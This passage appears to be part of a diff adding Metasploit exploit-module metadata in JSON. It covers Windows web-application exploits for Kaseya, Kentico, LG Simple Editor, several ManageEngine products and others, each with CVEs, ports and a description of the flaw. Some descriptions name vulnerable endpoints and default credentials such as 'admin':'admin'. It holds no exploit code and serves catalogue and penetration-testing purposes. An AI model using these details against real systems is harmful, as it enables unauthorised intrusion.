A malicious user can upload an ASP file to an arbitrary directory without previous\n authentication, leading to arbitrary code execution with IUSR privileges.", + "references": [ + "OSVDB-99984", + "BID-63782", + "EDB-29675", + "URL-http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Kaseya KServer / Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/kaseya_uploadimage_file_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/kentico_staging_syncserver": { + "name": "Kentico CMS Staging SyncServer Unserialize Remote Command Execution", + "fullname": "exploit/windows/http/kentico_staging_syncserver", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-04-15", + "type": "exploit", + "author": [ + "Manoj Cherukuri", + "Justin LeMay", + "aushack " + ], + "description": "This module exploits a vulnerability in the Kentico CMS platform versions 12.0.14 and earlier.\n Remote Command Execution is possible via unauthenticated XML requests to the Staging Service\n SyncServer.asmx interface ProcessSynchronizationTaskData method stagingTaskData parameter. 
XML\n input is passed to an insecure .NET deserialize call which allows for remote command execution.", + "references": [ + "CVE-2019-10068", + "URL-https://www.aon.com/cyber-solutions/aon_cyber_labs/unauthenticated-remote-code-execution-in-kentico-cms/" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Windows EXE Dropper", + "Windows Command", + "Windows Powershell" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/http/kentico_staging_syncserver.rb", + "is_install_path": true, + "ref_name": "windows/http/kentico_staging_syncserver", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/kolibri_http": { + "name": "Kolibri HTTP Server HEAD Buffer Overflow", + "fullname": "exploit/windows/http/kolibri_http", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-12-26", + "type": "exploit", + "author": [ + "mr_me ", + "TheLeader", + "sinn3r " + ], + "description": "This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.", + "references": [ + "CVE-2002-2268", + "OSVDB-70808", + "BID-6289", + "EDB-15834" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows XP sp3", + "Windows Server 2003 sp2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/kolibri_http.rb", + "is_install_path": true, + "ref_name": "windows/http/kolibri_http", + "check": true, + 
"post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/landesk_thinkmanagement_upload_asp": { + "name": "LANDesk Lenovo ThinkManagement Console Remote Command Execution", + "fullname": "exploit/windows/http/landesk_thinkmanagement_upload_asp", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-02-15", + "type": "exploit", + "author": [ + "Andrea Micalizzi", + "juan vazquez " + ], + "description": "This module can be used to execute a payload on LANDesk Lenovo\n ThinkManagement Suite 9.0.2 and 9.0.3.\n\n The payload is uploaded as an ASP script by sending a specially crafted\n SOAP request to \"/landesk/managementsuite/core/core.anonymous/ServerSetup.asmx\"\n , via a \"RunAMTCommand\" operation with the command '-PutUpdateFileCore'\n as the argument.\n\n After execution, the ASP script with the payload is deleted by sending\n another specially crafted SOAP request to \"WSVulnerabilityCore/VulCore.asmx\"\n via a \"SetTaskLogByFile\" operation.", + "references": [ + "CVE-2012-1195", + "CVE-2012-1196", + "OSVDB-79276", + "OSVDB-79277", + "BID-52023", + "EDB-18622", + "EDB-18623" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3 / Microsoft Windows Server 2003 SP2" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb", + "is_install_path": true, + "ref_name": "windows/http/landesk_thinkmanagement_upload_asp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/lexmark_markvision_gfd_upload": { + "name": "Lexmark MarkVision Enterprise Arbitrary File Upload", + 
"fullname": "exploit/windows/http/lexmark_markvision_gfd_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-12-09", + "type": "exploit", + "author": [ + "Andrea Micalizzi", + "juan vazquez " + ], + "description": "This module exploits a code execution flaw in Lexmark MarkVision Enterprise before version 2.1.\n A directory traversal vulnerability in the GfdFileUploadServlet servlet allows an unauthenticated\n attacker to upload arbitrary files, including arbitrary JSP code. This module has been\n tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.", + "references": [ + "CVE-2014-8741", + "ZDI-14-410", + "URL-http://support.lexmark.com/index?page=content&id=TE666&locale=EN&userlocale=EN_US" + ], + "platform": "Windows", + "arch": "java", + "rport": 9788, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Lexmark Markvision Enterprise 2.0" + ], + "mod_time": "2021-02-17 12:33:59 +0000", + "path": "/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/lexmark_markvision_gfd_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/lg_simple_editor_rce": { + "name": "LG Simple Editor Remote Code Execution", + "fullname": "exploit/windows/http/lg_simple_editor_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-08-24", + "type": "exploit", + "author": [ + "rgod", + "Ege Balcı " + ], + "description": "This Metasploit module exploits broken access control and directory traversal\n vulnerabilities in LG Simple Editor software for gaining code execution.\n The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.\n By exploiting this flaw, an attacker can upload and execute a malicious JSP\n payload with the 
SYSTEM user permissions.", + "references": [ + "ZDI-23-1204", + "CVE-2023-40498" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "LG Simple Editor <= v3.21" + ], + "mod_time": "2023-09-07 17:00:17 +0000", + "path": "/modules/exploits/windows/http/lg_simple_editor_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/lg_simple_editor_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/lg_simple_editor_rce_uploadvideo": { + "name": "LG Simple Editor Command Injection (CVE-2023-40504)", + "fullname": "exploit/windows/http/lg_simple_editor_rce_uploadvideo", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-08-04", + "type": "exploit", + "author": [ + "rgod", + "Michael Heinzl" + ], + "description": "Unauthenticated Command Injection in LG Simple Editor <= v3.21.0.\n The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\\SYSTEM.", + "references": [ + "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-1208/", + "CVE-2023-40504" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows_Fetch" + ], + "mod_time": "2024-08-13 20:29:30 +0000", + "path": "/modules/exploits/windows/http/lg_simple_editor_rce_uploadvideo.rb", + "is_install_path": true, + "ref_name": "windows/http/lg_simple_editor_rce_uploadvideo", + "check": true, + "post_auth": 
false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/mailenable_auth_header": { + "name": "MailEnable Authorization Header Buffer Overflow", + "fullname": "exploit/windows/http/mailenable_auth_header", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-04-24", + "type": "exploit", + "author": [ + "David Maciejak " + ], + "description": "This module exploits a remote buffer overflow in the MailEnable web service.\n The vulnerability is triggered when a large value is placed into the Authorization\n header of the web request. MailEnable Enterprise Edition versions prior to 1.0.5 and\n MailEnable Professional versions prior to 1.55 are affected.", + "references": [ + "CVE-2005-1348", + "OSVDB-15913", + "OSVDB-15737", + "BID-13350", + "URL-http://www.nessus.org/plugins/index.php?view=single&id=18123" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "MEHTTPS.exe Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/mailenable_auth_header.rb", + "is_install_path": true, + "ref_name": "windows/http/mailenable_auth_header", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manage_engine_opmanager_rce": { + "name": "ManageEngine OpManager Remote Code Execution", + "fullname": "exploit/windows/http/manage_engine_opmanager_rce", + "aliases": [], + "rank": 0, + "disclosure_date": "2015-09-14", + "type": "exploit", + "author": [ + "xistence " + ], + "description": "This module exploits a default credential vulnerability in ManageEngine 
OpManager, where a\n default hidden account \"IntegrationUser\" with administrator privileges exists. The account\n has a default password of \"plugin\" which cannot be reset through the user interface. By\n log-in and abusing the default administrator's SQL query functionality, it's possible to\n write a WAR payload to disk and trigger an automatic deployment of this payload. This\n module has been tested successfully on OpManager v11.0 and v11.4-v11.6 for Windows.", + "references": [ + "EDB-38174", + "CVE-2015-7765", + "CVE-2015-7766", + "URL-https://seclists.org/fulldisclosure/2015/Sep/66", + "URL-https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability" + ], + "platform": "Java", + "arch": "java", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "ManageEngine OpManager <= v11.6" + ], + "mod_time": "2021-02-17 12:33:59 +0000", + "path": "/modules/exploits/windows/http/manage_engine_opmanager_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/manage_engine_opmanager_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/manageengine_adaudit_plus_authenticated_rce": { + "name": "ManageEngine ADAudit Plus Authenticated File Write RCE", + "fullname": "exploit/windows/http/manageengine_adaudit_plus_authenticated_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-10-01", + "type": "exploit", + "author": [ + "Moon", + "Erik Wynter" + ], + "description": "This module exploits security issues in ManageEngine ADAudit Plus\n prior to 7006 that allow authenticated users to execute arbitrary\n code by creating a custom alert profile and leveraging its custom\n alert script component.\n\n The module first runs a few checks to test the provided\n credentials, 
retrieve the configured domain(s) and obtain the\n build number of the target ADAudit Plus server.\n\n If the credentials are valid and the target is\n vulnerable, the module creates an alert profile that will be\n triggered for any failed login attempt to the configured domain.\n\n For versions prior to build 7004, the payload is directly inserted\n in the custom alert script component of the alert profile.\n\n For versions 7004 and 7005, the module leverages an arbitrary file\n write vulnerability (CVE-2021-42847) to create a Powershell script\n in the alert_scripts directory that contains the payload. The name\n of this script is then provided as the value for the custom alert\n script component of the alert profile.\n\n This module requires valid credentials for an account with the\n privileges to create alert scripts. It has been successfully tested\n against ManageEngine ADAudit Plus builds 7003 and 7005 running on\n Windows Server 2012 R2.\n\n Successful exploitation will result in RCE as the user running\n ManageEngine ADAudit Plus, which will typically be the local\n administrator.", + "references": [ + "CVE-2021-42847", + "URL-https://pitstop.manageengine.com/portal/en/community/topic/fix-released-for-a-vulnerability-in-manageengine-adaudit-plus", + "URL-https://www.manageengine.com/products/active-directory-audit/adaudit-plus-release-notes.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 8081, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command" + ], + "mod_time": "2024-04-15 11:06:50 +0000", + "path": "/modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_adaudit_plus_authenticated_rce", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + 
"Reliability": [ + "first-attempt-fail" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manageengine_adaudit_plus_cve_2022_28219": { + "name": "ManageEngine ADAudit Plus CVE-2022-28219", + "fullname": "exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-06-29", + "type": "exploit", + "author": [ + "Naveen Sunkavally", + "Ron Bowes" + ], + "description": "This module exploits CVE-2022-28219, which is a pair of\n vulnerabilities in ManageEngine ADAudit Plus versions before build\n 7060: a path traversal in the /cewolf endpoint, and a blind XXE in,\n to upload and execute an executable file.", + "references": [ + "CVE-2022-28219", + "URL-https://www.horizon3.ai/red-team-blog-cve-2022-28219/", + "URL-https://attackerkb.com/topics/Zx3qJlmRGY/cve-2022-28219/rapid7-analysis", + "URL-https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 8081, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command" + ], + "mod_time": "2024-09-05 08:49:32 +0000", + "path": "/modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_adaudit_plus_cve_2022_28219", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection": { + "name": "ManageEngine ADManager Plus ChangePasswordAction Authenticated Command Injection", + "fullname": 
"exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-04-12", + "type": "exploit", + "author": [ + "Simon Humbert", + "Dinh Hoang", + "Grant Willcox" + ], + "description": "ManageEngine ADManager Plus prior to build 7181 is vulnerable to an authenticated command injection due to insufficient\n validation of user input when performing the ChangePasswordAction function before passing it into a string that is later\n used as an OS command to execute.\n\n By making a POST request to /api/json/admin/saveServerSettings with a params POST\n parameter containing a JSON array object that has a USERNAME or PASSWORD element containing a\n carriage return and newline, followed by the command the attacker wishes to execute, an attacker can gain RCE as the user\n running ADManager Plus, which will typically be the local administrator.\n\n Note that the attacker must be authenticated in order to send requests to /api/json/admin/saveServerSettings,\n so this vulnerability does require authentication to exploit.\n\n As this exploit modifies the HTTP proxy settings for the entire server, one cannot use fetch payloads\n with this exploit, since these will use HTTP connections that will be affected by the change in configuration.", + "references": [ + "CVE-2023-29084", + "URL-https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/", + "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-438/", + "URL-https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html", + "URL-https://www.manageengine.com/products/ad-manager/release-notes.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command" + ], + "mod_time": "2023-06-01 16:59:14 +0000", + 
"path": "/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manageengine_adselfservice_plus_cve_2021_40539": { + "name": "ManageEngine ADSelfService Plus CVE-2021-40539", + "fullname": "exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-09-07", + "type": "exploit", + "author": [ + "Antoine Cervoise", + "Wilfried Bécard", + "mr_me", + "wvu " + ], + "description": "This module exploits CVE-2021-40539, a REST API authentication bypass\n vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and\n execute it as the user running ADSelfService Plus - which is SYSTEM if\n started as a service.", + "references": [ + "CVE-2021-40539", + "URL-https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", + "URL-https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis", + "URL-https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", + "URL-https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py" + ], + "platform": "Java", + "arch": "java", + "rport": 8888, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Java Dropper" + ], + "mod_time": "2021-11-24 10:40:32 +0000", + "path": "/modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2021_40539.rb", + 
"is_install_path": true, + "ref_name": "windows/http/manageengine_adselfservice_plus_cve_2021_40539", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/manageengine_adselfservice_plus_cve_2022_28810": { + "name": "ManageEngine ADSelfService Plus Custom Script Execution", + "fullname": "exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-04-09", + "type": "exploit", + "author": [ + "Jake Baines", + "Hernan Diaz", + "Andrew Iwamaye", + "Dan Kelley" + ], + "description": "This module exploits the \"custom script\" feature of ADSelfService Plus. The\n feature was removed in build 6122 as part of the patch for CVE-2022-28810.\n For purposes of this module, a \"custom script\" is arbitrary operating system\n command execution.\n\n This module uses an attacker provided \"admin\" account to insert the malicious\n payload into the custom script fields. When a user resets their password or\n unlocks their account, the payload in the custom script will be executed.\n The payload will be executed as SYSTEM if ADSelfService Plus is installed as\n a service, which we believe is the normal operational behavior.\n\n This is a passive module because user interaction is required to trigger the\n payload. This module also does not automatically remove the malicious code from\n the remote target. 
Use the \"TARGET_RESET\" operation to remove the malicious\n custom script when you are done.\n\n ADSelfService Plus uses default credentials of \"admin\":\"admin\"", + "references": [ + "CVE-2022-28810", + "URL-https://www.manageengine.com/products/self-service-password/kb/cve-2022-28810.html", + "URL-https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 8888, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command" + ], + "mod_time": "2022-04-20 15:22:07 +0000", + "path": "/modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2022_28810.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_adselfservice_plus_cve_2022_28810", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manageengine_adshacluster_rce": { + "name": "ManageEngine Exchange Reporter Plus Unauthenticated RCE", + "fullname": "exploit/windows/http/manageengine_adshacluster_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2018-06-28", + "type": "exploit", + "author": [ + "Kacper Szurek " + ], + "description": "This module exploits a remote code execution vulnerability that\n exists in Exchange Reporter Plus <= 5310, caused by execution of\n bcp.exe file inside ADSHACluster servlet", + "references": [ + "URL-https://security.szurek.pl/en/manage-engine-exchange-reporter-plus-unauthenticated-rce/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 8181, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + 
"autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2022-10-07 01:59:52 +0000", + "path": "/modules/exploits/windows/http/manageengine_adshacluster_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_adshacluster_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manageengine_appmanager_exec": { + "name": "ManageEngine Applications Manager Remote Code Execution", + "fullname": "exploit/windows/http/manageengine_appmanager_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2018-03-07", + "type": "exploit", + "author": [ + "Mehmet Ince " + ], + "description": "This module exploits command injection vulnerability in the ManageEngine Application Manager product.\n An unauthenticated user can execute a operating system command under the context of privileged user.\n\n Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials\n by accessing given system. 
This endpoint calls a several internal classes and then executes powershell script\n without validating user supplied parameter when the given system is OfficeSharePointServer.", + "references": [ + "CVE-2018-7890", + "BID-103358", + "URL-https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/", + "URL-https://pitstop.manageengine.com/portal/community/topic/security-vulnerability-issues-fixed-upgrade-to-the-latest-version-of-applications-manager" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/manageengine_appmanager_exec.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_appmanager_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manageengine_apps_mngr": { + "name": "ManageEngine Applications Manager Authenticated Code Execution", + "fullname": "exploit/windows/http/manageengine_apps_mngr", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-04-08", + "type": "exploit", + "author": [ + "Jacob Giannantonio " + ], + "description": "This module logs into the Manage Engine Applications Manager to upload a\n payload to the file system and a batch script that executes the payload.", + "references": [ + "EDB-17152" + ], + "platform": "Windows", + "arch": "", + "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2018-08-20 18:08:19 +0000", + "path": "/modules/exploits/windows/http/manageengine_apps_mngr.rb", + "is_install_path": true, + 
"ref_name": "windows/http/manageengine_apps_mngr", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manageengine_connectionid_write": { + "name": "ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability", + "fullname": "exploit/windows/http/manageengine_connectionid_write", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-12-14", + "type": "exploit", + "author": [ + "sinn3r " + ], + "description": "This module exploits a vulnerability found in ManageEngine Desktop Central 9. When\n uploading a 7z file, the FileUploadServlet class does not check the user-controlled\n ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to\n inject a null bye at the end of the value to create a malicious file with an arbitrary\n file type, and then place it under a directory that allows server-side scripts to run,\n which results in remote code execution under the context of SYSTEM.\n\n Please note that by default, some ManageEngine Desktop Central versions run on port 8020,\n but older ones run on port 8040. 
Also, using this exploit will leave debugging information\n produced by FileUploadServlet in file rdslog0.txt.\n\n This exploit was successfully tested on version 9, build 90109 and build 91084.", + "references": [ + "URL-https://www.rapid7.com/blog/post/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249", + "CVE-2015-8249" + ], + "platform": "Windows", + "arch": "", + "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "ManageEngine Desktop Central 9 on Windows" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/http/manageengine_connectionid_write.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_connectionid_write", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966": { + "name": "ManageEngine Endpoint Central Unauthenticated SAML RCE", + "fullname": "exploit/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-01-10", + "type": "exploit", + "author": [ + "Khoa Dinh", + "horizon3ai", + "Christophe De La Fuente", + "h00die-gr3y " + ], + "description": "This exploits an unauthenticated remote code execution vulnerability\n that affects Zoho ManageEngine Endpoint Central and MSP versions 10.1.2228.10\n and below (CVE-2022-47966). Due to a dependency to an outdated library\n (Apache Santuario version 1.4.1), it is possible to execute arbitrary\n code by providing a crafted `samlResponse` XML to the Endpoint Central\n SAML endpoint. 
Note that the target is only vulnerable if it is\n configured with SAML-based SSO , and the service should be active.", + "references": [ + "CVE-2022-47966", + "URL-https://blog.viettelcybersecurity.com/saml-show-stopper/", + "URL-https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/", + "URL-https://github.com/horizon3ai/CVE-2022-47966", + "URL-https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis" + ], + "platform": "Java,Windows", + "arch": "", + "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Java (in-memory)", + "Windows EXE Dropper", + "Windows Command" + ], + "mod_time": "2024-06-14 12:05:12 +0000", + "path": "/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manageengine_servicedesk_plus_cve_2021_44077": { + "name": "ManageEngine ServiceDesk Plus CVE-2021-44077", + "fullname": "exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-09-16", + "type": "exploit", + "author": [ + "wvu ", + "Y4er" + ], + "description": "This module exploits CVE-2021-44077, an unauthenticated remote code\n execution vulnerability in ManageEngine ServiceDesk Plus, to upload an\n EXE (msiexec.exe) and execute it as the SYSTEM account.\n\n Note that build 11305 is vulnerable to the authentication bypass but\n not the file upload. 
